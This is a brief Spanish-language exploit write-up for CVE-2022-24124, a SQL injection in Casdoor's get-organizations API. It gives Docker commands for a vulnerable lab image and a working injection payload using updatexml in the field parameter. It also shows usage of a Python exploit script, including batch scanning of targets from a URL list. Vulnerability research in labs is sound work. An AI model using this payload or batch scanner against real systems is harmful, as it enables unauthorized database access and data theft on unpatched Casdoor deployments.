
Exploit de CVE-2022-24124
Casdoor es una plataforma de autenticación de inicio de sesión único (SSO) centralizada basada en OAuth 2.0/OIDC
ID de CVE: CVE-2022-24124
ID CNPD: CNPD-202201-7304
Nivel de riesgo: Alto ( 7.5 HIGH )
POC/EXP: Público
Casdoor < Casdoor 1.13.1 // Todas las versiones anteriores a 1.13.1 están afectadas
Esta vulnerabilidad es una inyección SQL. En la API de consulta existe una vulnerabilidad de inyección SQL relacionada con los parámetros de campo y valor, como se muestra en api/get-organizations.
Descargar la imagen vulnerable
docker pull vulfocus/casdoor:1.13.0

Iniciar el entorno vulnerable
docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

Abrir la página del entorno vulnerable

Usar el POC para construir el payload
POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

python3 CVE-2022-24124.py -h

python3 CVE-2022-24124.py -u http://127.0.0.1

python3 CVE-2022-24124.py -f urls.txt

https://nvd.nist.gov/vuln/detail/CVE-2022-24124
https://github.com/ColdFusionX/CVE-2022-24124
https://github.com/0xAbbarhSF/CVE-2022-24124
Referenciado desde https://www.t00ls.com/thread-66989-1-1.html
Como práctica, escribí una versión en Python y agregué una función de detección por lotes.